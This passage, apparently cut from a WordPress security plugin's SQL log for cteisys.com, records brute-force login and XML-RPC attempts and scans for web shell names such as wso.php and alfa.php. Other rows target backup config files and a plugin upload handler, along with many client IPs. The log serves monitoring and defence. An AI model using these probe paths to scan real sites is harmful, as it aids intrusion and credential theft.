|0|0|0|cteisys.com/up.php',0,19,0),('80.76.51.29',1347171101,'',0,1663768639.1601,55,'6fY0jRwnH3yJDlr1WigEXCbu','','19|0|0|0|cteisys.com/upload.php',0,19,0),('80.76.51.29',1347171101,'',0,1663768645.4516,55,'8yCpXsb1miPMwnDrv3taKo9h','','19|0|0|0|cteisys.com/config.php',0,19,0),('80.76.51.29',1347171101,'',0,1663768649.6042,100,'7VYHXbnSkUBiP85TNtCjD4hf','','13|0|0|0|cteisys.com/test.php',0,13,0),('80.76.51.29',1347171101,'',0,1663768650.7989,55,'bHReML8h0dJx9UiGqwjFEO1Y','','19|0|0|0|cteisys.com/wp-content/langar.php',0,19,0),('80.76.51.29',1347171101,'',0,1663768653.1720,55,'XpGQB0hyaiWFL356S9e7q82E','','19|0|0|0|cteisys.com/wp-content/plugins/fancy-product-designer/inc/custom-image-handler.php',0,19,0),('83.150.214.18',1402394130,'newd',0,1663769219.9379,7,'TD9J6y57ZwqPebF4mtjYOU3a','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('83.150.214.18',1402394130,'tidarat',0,1663769221.6746,51,'OHx9zbhRnmaujKD2Le6s3Glp','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('89.253.233.129',1509812609,'newd',0,1663771619.7454,7,'gEKFhu36q7bjMPADdra0T5RB','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('89.253.233.129',1509812609,'erwan',0,1663771623.0641,51,'ld9iwRS7OZqXsvLM3CaJPgrn','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('164.90.170.66',2757405250,'newd',0,1663772047.6019,7,'5kZtoQ8Hb9LcVWG2gnup0YRe','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('164.90.170.66',2757405250,'agent',0,1663772048.9507,51,'5g6XHTNlJsLmwOEIAYvjSf0G','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('15.236.225.141',267182477,'',0,1663774949.7022,55,'QI84pNsvPYDH5cg063hmtCoO','','19|0|0|0|cteisys.com/wp-commentin.php',0,19,0),('15.236.225.141',267182477,'',0,1663774952.0741,55,'D7vrLQNfbdg6OAzc9UR4ZCEX','','19|0|0|0|cteisys.com/wp/wp-commentin.php',0,19,0),('15.236.225.141',267182477,'',0,1663774954.9834,55,'9fFpRQdhTvIlVywCKbr372At','','19|0|0|0|cteisys.com/wordpress/wp-commentin.php',0,19,0),('15.236.225.141',267182477,'',0,1663774960.2038,55,'fGNq3Dr5ag4V6kLMiSxHJjp1','','19|0|0|0|cteisys.com/blog/wp-commentin.php',0,19,0),('15.236.225.141',267182477,'',0,1663774962.3111,55,'x2wA0YZbB3IKqHrtnogJvcXS','','19|0|0|0|cteisys.com/site/wp-commentin.php',0,19,0),('15.236.225.141',267182477,'',0,1663774962.3134,10,'x2wA0YZbB3IKqHrtnogJvcXS','','707|0|0|0|cteisys.com/site/wp-commentin.php',0,707,0),('51.15.183.168',856668072,'',0,1663775125.0945,55,'Tb5WFRVYfK4ioz71ONP3kQ8w','','19|0|0|0|cteisys.com/includes/fckeditor/editor/filemanager/browser/default/connectors/php/connector.php',0,19,0),('184.75.223.227',3091980259,'joyce',0,1663779540.0351,152,'tvhKUqzjmDg2PxQ8FOMnrasB','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('74.205.112.88',1254977624,'newd',0,1663784156.4604,7,'gmpNG0ZPK9yco3HUeRu2MEwx','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('74.205.112.88',1254977624,'stang',0,1663784157.3124,51,'2Mca6V8fuKrylBjZO4WzRbCo','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('213.152.162.154',3583550106,'joyce',0,1663788385.8068,152,'sGDv3Z4pAMFWi9yfPTxarj5w','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('5.161.128.226',94470370,'newd',0,1663789697.2009,152,'1B2Mu8xLPrelvqoA7mtcZJSR','','0|0|0|0|cteisys.com//xmlrpc.php',0,0,0),('213.142.149.80',3582891344,'newd',0,1663795687.5377,7,'G7SlThpOYnFc8q4uy2oktiMr','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('213.142.149.80',3582891344,'amperio',0,1663795689.0481,51,'8B0qVvoy1teaDG29pS6zNgXQ','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('178.162.204.214',2997013718,'joyce',0,1663796693.6242,152,'AqhjYLvaeyfJsDRKd459FmWi','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('82.218.176.68',1390063684,'newd',0,1663801742.2790,7,'MziyBcNUlgJjLm0IeG85hOZA','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('82.218.176.68',1390063684,'marine',0,1663801743.6660,51,'4TefRkmMSihanA2lt7d35Vc9','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('20.168.36.92',346563676,'',0,1663807598.4987,56,'Ao9quzxfgsW34IRyKBdpQJnV','','22|0|0|0|cteisys.com/wp-admin/admin-ajax.php',0,22,0),('20.168.36.92',346563676,'',0,1663807598.5038,10,'Ao9quzxfgsW34IRyKBdpQJnV','','710|0|0|0|cteisys.com/wp-admin/admin-ajax.php',0,710,0),('137.63.71.51',2302625587,'joyce',0,1663813701.1376,152,'DLA7eG0tU4QcJIVxaZk3iz1F','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('31.3.152.100',520329316,'joyce',0,1663814090.0170,152,'wir2Z8jNQ6kxYen1vusmMbfX','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('132.145.39.16',2224105232,'',0,1663841663.0615,55,'dky9VmqaJDpOj1Cr4AMuigRf','','19|0|0|0|cteisys.com/wp-includes/css/shell.php',0,19,0),('132.145.39.16',2224105232,'',0,1663841663.8219,55,'K1NORIMlYTm3ZdnJiejvUog7','','19|0|0|0|cteisys.com/wp-includes/cssmini.php',0,19,0),('132.145.39.16',2224105232,'',0,1663841664.5933,55,'q8bhpo0agvQLS2N3tTzYJwEk','','19|0|0|0|cteisys.com/wp-content/plugins/wp-class.php',0,19,0),('132.145.39.16',2224105232,'',0,1663841665.4229,55,'M6zEY0RZeT2oUKntAN9x4s8v','','19|0|0|0|cteisys.com/wp-content/plugins/wp-ver.php',0,19,0),('132.145.39.16',2224105232,'',0,1663841666.2223,55,'xD1OnoU8Ek0ZF9wJzWYTh6At','','19|0|0|0|cteisys.com/wp-content/plugins/wso.php',0,19,0),('132.145.39.16',2224105232,'',0,1663841667.0063,55,'WrEKOw9lZyvMDgRVBXcUuIxt','','19|0|0|0|cteisys.com/wp-content/plugins/wso2.php',0,19,0),('132.145.39.16',2224105232,'',0,1663841667.8079,55,'XLyGpKEMSHlOtP7qjbDuUWxV','','19|0|0|0|cteisys.com/wp-content/plugins/w3llstore.php',0,19,0),('132.145.39.16',2224105232,'',0,1663841668.5947,55,'lwGNZxM9XbPKsuRacCkAL8ni','','19|0|0|0|cteisys.com/wp-content/plugins/wp-email.php',0,19,0),('132.145.39.16',2224105232,'',0,1663841669.4010,55,'erYqGAWaICH0QDduMcRk48NF','','19|0|0|0|cteisys.com/wp-content/plugins/olux.php',0,19,0),('132.145.39.16',2224105232,'',0,1663841670.1987,55,'qXhe45aBK0LjCf8VQn3FJtb9','','19|0|0|0|cteisys.com/wp-content/plugins/wp-activate.php',0,19,0),('132.145.39.16',2224105232,'',0,1663841671.0000,55,'YloXE6UDkxSrIVsLhb1nitBA','','19|0|0|0|cteisys.com/wp-content/plugins/shell.php',0,19,0),('132.145.39.16',2224105232,'',0,1663841671.8013,55,'rgS6XdiKwaoxMyh7PkvfYDn9','','19|0|0|0|cteisys.com/wp-content/pluginsmini.php',0,19,0),('132.145.39.16',2224105232,'',0,1663841672.5624,55,'FnSCVK2I0xU8AkE45LbHfqNo','','19|0|0|0|cteisys.com/wp-content/themes/wp-class.php',0,19,0),('132.145.39.16',2224105232,'',0,1663841673.3519,55,'HCq3AozundXWIBxSRFpGehkP','','19|0|0|0|cteisys.com/wp-content/themes/wp-ver.php',0,19,0),('132.145.39.16',2224105232,'',0,1663841674.1227,55,'xRzU49DQBb5k2vdJIrf3wjyK','','19|0|0|0|cteisys.com/wp-content/themes/wso.php',0,19,0),('132.145.39.16',2224105232,'',0,1663841674.9250,55,'9pBtc4x5lo7ZMXGq1fDOAC60','','19|0|0|0|cteisys.com/wp-content/themes/wso2.php',0,19,0),('132.145.39.16',2224105232,'',0,1663841675.7386,55,'YQ2jWc9vy3GhDBXsbfeFtJ7V','','19|0|0|0|cteisys.com/wp-content/themes/w3llstore.php',0,19,0),('132.145.39.16',2224105232,'',0,1663841676.5230,55,'5TtkQvumqwObzIXKBLE7Zog8','','19|0|0|0|cteisys.com/wp-content/themes/wp-email.php',0,19,0),('132.145.39.16',2224105232,'',0,1663841677.3137,55,'0Pfa7LZyhrvRTlqgmMdx9jBV','','19|0|0|0|cteisys.com/wp-content/themes/olux.php',0,19,0),('132.145.39.16',2224105232,'',0,1663841678.0959,55,'Lxm87nejEMutC2UFqpTJGWv6','','19|0|0|0|cteisys.com/wp-content/themes/wp-activate.php',0,19,0),('132.145.39.16',2224105232,'',0,1663841678.9070,55,'2NuQR4alEX5DkJGOsmzqFTBp','','19|0|0|0|cteisys.com/wp-content/themes/shell.php',0,19,0),('132.145.39.16',2224105232,'',0,1663841679.6659,55,'6CoDH7PjOsfMzLATrp49cvmQ','','19|0|0|0|cteisys.com/wp-content/themesmini.php',0,19,0),('132.145.39.16',2224105232,'',0,1663841680.4661,55,'tDvckUf0T2V3I6nKQBzG7SyW','','19|0|0|0|cteisys.com/wp-content/uploads/wp-class.php',0,19,0),('132.145.39.16',2224105232,'',0,1663841681.2276,55,'Xjb8JtgDoPBqfhSzQ49a2vH6','','19|0|0|0|cteisys.com/wp-content/uploads/wp-ver.php',0,19,0),('132.145.39.16',2224105232,'',0,1663841681.9730,55,'DKhMq1564wsAJU3Suy9ZHvgN','','19|0|0|0|cteisys.com/wp-content/uploads/wso.php',0,19,0),('132.145.39.16',2224105232,'',0,1663841682.7849,55,'LJnt1OVfIpuDjlP85UEAYGmo','','19|0|0|0|cteisys.com/wp-content/uploads/wso2.php',0,19,0),('132.145.39.16',2224105232,'',0,1663841683.6680,55,'S3kqKEHOf5bzTuyZAL0roYFn','','19|0|0|0|cteisys.com/wp-content/uploads/w3llstore.php',0,19,0),('132.145.39.16',2224105232,'',0,1663841684.4277,55,'EdexlDtOIA97YwPSrkbNFivm','','19|0|0|0|cteisys.com/wp-content/uploads/wp-email.php',0,19,0),('132.145.39.16',2224105232,'',0,1663841685.1656,55,'oSbAmluqFLMYnhrWDQXNRO40','','19|0|0|0|cteisys.com/wp-content/uploads/olux.php',0,19,0),('132.145.39.16',2224105232,'',0,1663841685.9636,55,'81EtlCIar5dhSuzMJjRFYny0','','19|0|0|0|cteisys.com/wp-content/uploads/wp-activate.php',0,19,0),('132.145.39.16',2224105232,'',0,1663841686.7720,55,'kWzY7bAQwixJeBKmrMvjtD8P','','19|0|0|0|cteisys.com/wp-content/uploads/shell.php',0,19,0),('132.145.39.16',2224105232,'',0,1663841687.5678,55,'02w15uJObpkc6EesQvh7NFWA','','19|0|0|0|cteisys.com/wp-content/uploadsmini.php',0,19,0),('132.145.39.16',2224105232,'',0,1663841688.3246,55,'3GxyaRhClbrwgzHo7OvcS8X5','','19|0|0|0|cteisys.com/wp-content/plugins/contact/wp-class.php',0,19,0),('132.145.39.16',2224105232,'',0,1663841689.0584,55,'VHsITUjt4FiwbPNmgkpe8AKO','','19|0|0|0|cteisys.com/wp-content/plugins/contact/wp-ver.php',0,19,0),('132.145.39.16',2224105232,'',0,1663841689.8879,55,'ltW510HQjiLUqdygKfP6Nrzh','','19|0|0|0|cteisys.com/wp-content/plugins/contact/wso.php',0,19,0),('132.145.39.16',2224105232,'',0,1663841690.6465,55,'c7D12q0prHlWbOIPfny6G5Lz','','19|0|0|0|cteisys.com/wp-content/plugins/contact/wso2.php',0,19,0),('132.145.39.16',2224105232,'',0,1663841691.4424,55,'KmNTuGkEYzgdbWFphXMIL0iB','','19|0|0|0|cteisys.com/wp-content/plugins/contact/w3llstore.php',0,19,0),('132.145.39.16',2224105232,'',0,1663841692.2423,55,'um43YjNDU2TWs1Hv0l9fbGqx','','19|0|0|0|cteisys.com/wp-content/plugins/contact/wp-email.php',0,19,0),('132.145.39.16',2224105232,'',0,1663841693.0172,55,'IHSVkU25zbPnJe7c9fFqr4Qv','','19|0|0|0|cteisys.com/wp-content/plugins/contact/olux.php',0,19,0),('132.145.39.16',2224105232,'',0,1663841693.8510,55,'LZT79UhqCVPBIjxwbpmkfQF5','','19|0|0|0|cteisys.com/wp-content/plugins/contact/wp-activate.php',0,19,0),('132.145.39.16',2224105232,'',0,1663841694.7241,55,'V1eg6unbE4lzmqBrkXwHhRdy','','19|0|0|0|cteisys.com/wp-content/plugins/contact/shell.php',0,19,0),('132.145.39.16',2224105232,'',0,1663841695.4959,55,'kceC8Af0PFml7Rp4JTiSdwun','','19|0|0|0|cteisys.com/wp-content/plugins/contactmini.php',0,19,0),('81.68.87.46',1363433262,'admin',0,1663841769.5618,152,'y4gTZpi6sMLE0Rj9Y3VtfXOa','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('90.156.169.12',1520216332,'admin',0,1663842247.5420,152,'RQz48Zeao09klfLwqxnJSv6b','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('190.92.159.48',3193741104,'admin',0,1663842353.1320,152,'3MDTz106OJKp2Ix8AdNjB7om','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('93.186.115.226',1572500450,'newd',0,1663842430.4193,7,'Z6xhIVd4vq9o7FwrQRYCK2Pj','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('93.186.115.226',1572500450,'5ks2o4zi',0,1663842433.4173,51,'3cCGILQrTDdPS1HJ6B0bKUln','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('152.89.196.13',2556019725,'',0,1663842527.1248,55,'eXz94nyTmsV3W8vuZfKb6tEr','','19|0|0|0|cteisys.com/s_noeval.php',0,19,0),('209.141.56.13',3515693069,'Joyce',0,1663842681.9769,51,'2P60lWMw8nugLQX1NkKcStvG','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('119.8.58.8',1997027848,'admin',0,1663842788.6863,152,'frVnuS6LAqdks9Mexa817bKH','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('82.165.184.76',1386592332,'admin',0,1663843418.0615,152,'pMhbkm7S3ZLE2WgryOjHNi8T','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('190.145.68.131',3197191299,'admin',0,1663843525.3735,152,'9bUtEL0SkvmZQfh2T6yeMgOu','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('152.89.196.13',2556019725,'',0,1663843901.8852,55,'UTcZ5SGOBsbMKplvDodi2kQe','','19|0|0|0|cteisys.com/wp-content/uploads/nin.php',0,19,0),('101.0.73.142',1694517646,'admin',0,1663843970.3242,152,'NZtxF1v2G0kELmoy4aiPpH6w','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('177.52.160.29',2973016093,'admin',0,1663844105.3036,152,'XKViNQk29qYI81TEwmHdvnoy','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('153.92.4.20',2572944404,'newd',0,1663846409.9457,7,'2eyiTVD1BJx6uLPta7cq0mSQ','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('153.92.4.20',2572944404,'user3',0,1663846411.5154,51,'7CA6BQy18TczOwJMLFWmbrEt','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('162.215.217.77',2732054861,'admin',0,1663846459.6516,152,'Cdp6gUSMYqk84JeAOXo3uNzt','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('162.14.71.142',2718844814,'admin',0,1663846908.0111,152,'VmL8qflRXnpc1ua3NYDstBPO','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('95.173.161.171',1605214635,'admin',0,1663847064.2841,152,'fU81b0ldSVzaCGo52AFpc73P','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('95.173.161.171',1605214635,'admin',0,1663847683.9515,152,'JW6GSzklQdUp0T1H9b5uwetM','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('152.89.196.13',2556019725,'',0,1663848158.7733,55,'j0x7IEW5GXBVkpbnHcUPRD2Y','','19|0|0|0|cteisys.com/sites/default/files/69.php',0,19,0),('85.31.46.140',1428106892,'',0,1663863909.7413,55,'duEq0tKWyj7HUQIi6srRXfBb','','19|0|0|0|cteisys.com/moduless.php',0,19,0),('85.31.46.140',1428106892,'',0,1663863920.9173,55,'fUsmk25h0BuaMiPKEd9w364Y','','19|0|0|0|cteisys.com/wp-content/plugins/t_file_wp/t_file_wp.php',0,19,0),('85.31.46.140',1428106892,'',0,1663863922.6871,55,'4lSQYDPeb7hLGIw6Tv3R5VWp','','19|0|0|0|cteisys.com/admin.php',0,19,0),('85.31.46.140',1428106892,'',0,1663863993.5336,55,'o90yd6lTF12vuY7Kg5QMOiUS','','19|0|0|0|cteisys.com/boom.php',0,19,0),('85.31.46.140',1428106892,'',0,1663863993.5373,10,'o90yd6lTF12vuY7Kg5QMOiUS','','707|0|0|0|cteisys.com/boom.php',0,707,0),('85.31.46.140',1428106892,'',0,1663863995.0180,55,'4roJ2dOY5hWjqH7tKTP0Axyv','','19|0|0|0|cteisys.com/wp-content/plugins/backup_index.php',0,19,0),('85.31.46.140',1428106892,'',0,1663863997.3048,55,'RpvL12NtdwkHriSIW9TjF37B','','19|0|0|0|cteisys.com/wp-content/db_cache.php',0,19,0),('85.31.46.140',1428106892,'',0,1663863998.9906,100,'wLqYEneA9ugsotMkTUmPIirb','','13|0|0|0|cteisys.com/wp-content/plugins/ioptimization/IOptimize.php',0,13,0),('85.31.46.140',1428106892,'',0,1663864001.7448,100,'N5elSgCaIcOBVL1UjFn0H8tu','','13|0|0|0|cteisys.com/xmlrp.php',0,13,0),('85.31.46.140',1428106892,'',0,1663864003.0731,100,'dtsThrC3pkSgA4ZzGXmRV2Jf','','13|0|0|0|cteisys.com/wpindex.php',0,13,0),('85.31.46.140',1428106892,'',0,1663864007.1399,100,'0y5HYvaEp7TCP1e9MJRDlqQi','','13|0|0|0|cteisys.com/larva.php',0,13,0),('85.31.46.140',1428106892,'',0,1663864009.9237,100,'AWPbul217vpIKUn60YG4thMD','','13|0|0|0|cteisys.com/th3_err0r.php',0,13,0),('85.31.46.140',1428106892,'',0,1663864014.2537,55,'s6cIrXlpOaDTmASUM8JVQFj3','','19|0|0|0|cteisys.com/alfindex.php',0,19,0),('85.31.46.140',1428106892,'',0,1663864017.2174,55,'IMdY9XLa4zkAOplN1BmnPxqH','','19|0|0|0|cteisys.com/alfa.php',0,19,0),('85.31.46.140',1428106892,'',0,1663864019.6555,55,'1Lrnx74XqWySj03MYltQdfmI','','19|0|0|0|cteisys.com/wp-booking.php',0,19,0),('85.31.46.140',1428106892,'',0,1663864021.1172,55,'DTQUHCKgoy5up2a39qsIBZzb','','19|0|0|0|cteisys.com/cindex.php',0,19,0),('85.31.46.140',1428106892,'',0,1663864027.0098,55,'qmOndzAZte6ahvBpI3wQCcNG','','19|0|0|0|cteisys.com/wp-content/wp-1ogin_bak.php',0,19,0),('85.31.46.140',1428106892,'',0,1663864030.6845,55,'18VwaSqXk5ENFnAxslBhtIzK','','19|0|0|0|cteisys.com/wp-1ogin_bak.php',0,19,0),('85.31.46.140',1428106892,'',0,1663864033.5073,55,'EQjVxnJtNKkUo4OwDyAesFCf','','19|0|0|0|cteisys.com/wp-includes/fonts/css.php',0,19,0),('85.31.46.140',1428106892,'',0,1663864037.9904,55,'ElNqmAF3Jsyuh6trjMPo2gY8','','19|0|0|0|cteisys.com/wp-includes/css/css.php',0,19,0),('85.31.46.140',1428106892,'',0,1663864042.0945,55,'B09EWst1LFcgPiJnmMkZHlKz','','19|0|0|0|cteisys.com/old-index.php',0,19,0),('85.31.46.140',1428106892,'',0,1663864045.8714,55,'QA4SKeBE1wPi20jJMpDzkd7b','','19|0|0|0|cteisys.com/config.bak.php',0,19,0),('85.31.46.140',1428106892,'',0,1663864048.6907,55,'Zi8pL37BeGuN1KXjAqct5aln','','19|0|0|0|cteisys.com/wp-admin/config.bak.php',0,19,0),('85.31.46.140',1428106892,'',0,1663864050.7589,55,'lsXZLTHz1afeUcPdhyD6EwVk','','19|0|0|0|cteisys.com/wp-content/config.bak.php',0,19,0),('85.31.46.140',1428106892,'',0,1663864055.0410,55,'UFmSucRfBwqsotCQ4GPlEOeV','','19|0|0|0|cteisys.com/wp-includes/config.bak.php',0,19,0),('85.31.46.140',1428106892,'',0,1663864059.2753,55,'tKIXhTzQJZSBu6qGYblsNmMe','','19|0|0|0|cteisys.com/wp-content/themes/config.bak.php',0,19,0),('85.31.46.140',1428106892,'',0,1663864065.2213,55,'GaUD7W6EMleF4yJ3CokPimYS','','19|0|0|0|cteisys.com/wp-content/plugins/config.bak.php',0,19,0),('85.31.46.140',1428106892,'',0,1663864068.9567,18,'kHAo7KwEgjfFz92NIQYmLZ15','','13|0|0|0|cteisys.com/wp-includes/css/wp-config.php',0,13,0),('85.31.46.140',1428106892,'',0,1663864074.6270,55,'Br7VemMNjscvOqKkaAlfPZSC','','19|0|0|0|cteisys.com/wp-content/plugins/ubh/up.php',0,19,0),('85.31.46.140',1428106892,'',0,1663864085.7094,100,'NBjQlwOtT0cvDJRb85msi9go','','13|0|0|0|cteisys.com/wp-includes/wpconfig.bak.php',0,13,0),('85.31.46.140',1428106892,'',0,1663864087.5349,100,'LhDtqG3oHIaO6dbSX01yjMUY','','13|0|0|0|cteisys.com/wp-content/plugins/wpconfig.bak.php',0,13,0),('85.31.46.140',1428106892,'',0,1663864096.9256,55,'vdS840jPu1BQ3HWwxf7pDRlK','','19|0|0|0|cteisys.com/haders.php',0,19,0),('85.31.46.140',1428106892,'',0,1663864098.6779,100,'9guv3WkHoIshn2tzKErx0Xm7','','13|0|0|0|cteisys.com/wp-content/wp-old-index.php',0,13,0),('85.31.46.140',1428106892,'',0,1663864099.7127,55,'GHrBWCY9U3bwPxQStEsAZ0dM','','19|0|0|0|cteisys.com/legion.php',0,19,0),('85.31.46.140',1428106892,'',0,1663864107.4523,55,'EcnkrloPKzGdSDfA728MYOQH','','19|0|0|0|cteisys.com/wp-content/mu-plugins/db-safe-mode.php',0,19,0),('85.31.46.140',1428106892,'',0,1663864110.4626,55,'UCaOBg6R9S7qzAwYlmQcHr1K','','19|0|0|0|cteisys.com/wp-includes/lfx.php',0,19,0),('85.31.46.140',1428106892,'',0,1663864116.1658,55,'cYk4tXFET0hGjONHfdQB89VI','','19|0|0|0|cteisys.com/wp-includes/small.php',0,19,0),('85.31.46.140',1428106892,'',0,1663864121.3866,55,'dRG7qCKvcxJjhUN052LFZu41','','19|0|0|0|cteisys.com/up.php',0,19,0),('85.31.46.140',1428106892,'',0,1663864123.7505,55,'fM5RzhymX8dOKwZCr7exnbYs','','19|0|0|0|cteisys.com/upload.php',0,19,0),('85.31.46.140',1428106892,'',0,1663864126.3952,55,'ct6JUyNKgDHGRfBXh32OZsIj','','19|0|0|0|cteisys.com/config.php',0,19,0),('85.31.46.140',1428106892,'',0,1663864129.1121,100,'9OMSaofi1u3zqWXZFEKr2ltk','','13|0|0|0|cteisys.com/test.php',0,13,0),('85.31.46.140',1428106892,'',0,1663864130.2688,55,'QzM72Aakc6hs5G4dfBOo1l8F','','19|0|0|0|cteisys.com/wp-content/langar.php',0,19,0),('85.31.46.140',1428106892,'',0,1663864134.4885,55,'Jwq8f46Wv2t5iloM3RdbL9FT','','19|0|0|0|cteisys.com/wp-content/plugins/fancy-product-designer/inc/custom-image-handler.php',0,19,0),('75.119.157.181',1266130357,'admin',0,1663864230.0568,51,'2OINtBmH9ksWcF5K3ChDxjQS','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('165.22.109.42',2769710378,'admin',0,1663864272.7882,51,'wUs5CZX4F1GEmclobDQvAYfx','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('45.137.66.199',763970247,'newd',0,1663865300.6908,7,'vdQUYWKFCHk6ftibVyJoRzIM','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('45.137.66.199',763970247,'test',0,1663865302.1920,51,'H2eLGOgCJvIQU7xdmc0t63za','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('93.125.114.121',1568502393,'newd',0,1663865343.4313,7,'B2IFNwq6VPgHtU8zL1kOSJju','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('93.125.114.121',1568502393,'safet',0,1663865347.1938,51,'ruiCGY930qH7Lwz1mZK5h2Pg','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('202.21.38.119',3390383735,'admin',0,1663865673.3498,51,'rAO7TKNfVGPXnhq2MslJS1F9','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('69.163.224.107',1168367723,'admin',0,1663865716.3525,51,'3kTVvEmoDHIC80faeY42hrSP','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('171.244.0.91',2884894811,'admin',0,1663867118.1800,51,'kIsauFzJdtbrCK932M5UpT4R','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('167.172.168.111',2813110383,'admin',0,1663867142.1167,51,'PZDmib3NvsWtYBKLdnA9fHz7','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('62.102.148.156',1046910108,'joyce',0,1663868049.1375,152,'49ntaeMsC8iSRgVKrPzYN1Uu','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('139.59.82.122',2335920762,'admin',0,1663868520.3609,51,'liLPMHB0rne9hKuFWASRQamZ','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('46.101.150.34',778409506,'admin',0,1663868563.0322,51,'vgeGwa75fbiJlT9mE8XMAq0I','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('23.148.145.50',395612466,'',0,1663869611.2045,55,'9rRgp6wjQFdzCAqGJ31VbZH5','','19|0|0|0|cteisys.com/wp-includes/wp-class.php',0,19,0),('23.148.145.50',395612466,'',0,1663869624.2250,55,'nKv2WrZQRibjgE8t0zc3wUMY','','19|0|0|0|cteisys.com/wp-includes/wp-class.php',0,19,0),('141.94.247.170',2371811242,'admin',0,1663869931.5201,51,'3oZwXQgCjbzGivxt5qFnsJar','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('142.93.41.19',2388470035,'admin',0,1663869974.4434,51,'uzoSircdGUwleyn6R2EYOq45','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('51.15.183.168',856668072,'',0,1663869994.8037,55,'r4BIbujFQnapGyh5SOdN0Hog','','19|0|0|0|cteisys.com/includes/FCKeditor/editor/filemanager/browser/default/connectors/php/connector.php',0,19,0),('46.101.202.174',778422958,'newd',0,1663870158.4613,7,'NPc8HDOzt57GlJFevVR2YEwg','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('46.101.202.174',778422958,'aadmin',0,1663870159.7483,51,'TM0yUpoPtwJqdvsWI5bukclC','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('51.89.47.206',861482958,'newd',0,1663871315.6097,7,'WY3g2yxdFQKthwVRaAqJ1MzT','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('207.154.248.39',3483039783,'newd',0,1663871356.4628,7,'qWAO1ekScD0Xu95x42UrZlE3','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('185.156.175.35',3114053411,'joyce',0,1663872668.7102,152,'MpSuYAFrn1jgZtNbyodlkJq4','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('23.99.229.218',392422874,'newd',0,1663872671.3491,7,'ISkoXYdJviKmyFZgcEaxDUeH','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('167.172.168.111',2813110383,'newd',0,1663872710.8084,7,'AJLU4KM5n8Cz0gByfotZmD6k','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('145.239.30.120',2448367224,'newd',0,1663874035.7311,7,'Qml96iH1RwjxayctfvJYsFbS','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('143.244.177.220',2415178204,'newd',0,1663874074.7065,7,'AXdDZi0KYy8fFhc5UIsGSjbg','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('217.21.87.243',3642054643,'newd',0,1663875397.0580,7,'NSkFEpg4Kz95YXbivrHyo68C','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('207.154.250.8',3483040264,'newd',0,1663875436.6232,7,'RZbWSkCJaX4jOczDLAwU6ye9','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('23.88.110.165',391671461,'newd',0,1663875445.4726,7,'hCQNormlaAJ19jgckOyBGfvT','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('23.88.110.165',391671461,'contact',0,1663875447.2734,51,'0vKAETtnxM4PgbySkGrVWUsC','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('192.249.115.227',3237573603,'newd',0,1663875841.3696,7,'EhTWvjCOtoS9RYXK3xza7GnD','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('192.249.115.227',3237573603,'rootuser',0,1663875842.1638,51,'rzsIbX4g0f82UFwx9JQNCD6K','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('188.127.239.132',3162500996,'newd',0,1663876097.6347,7,'f9ChBbR6xOw1tTdsmKnZ3UV2','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('188.127.239.132',3162500996,'12345',0,1663876099.4148,51,'G92kQj6KXzIZerbTsqgMCABi','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('167.71.117.225',2806478305,'newd',0,1663876765.7032,7,'ysA0dScaRgvXDm5p1lfCLbuq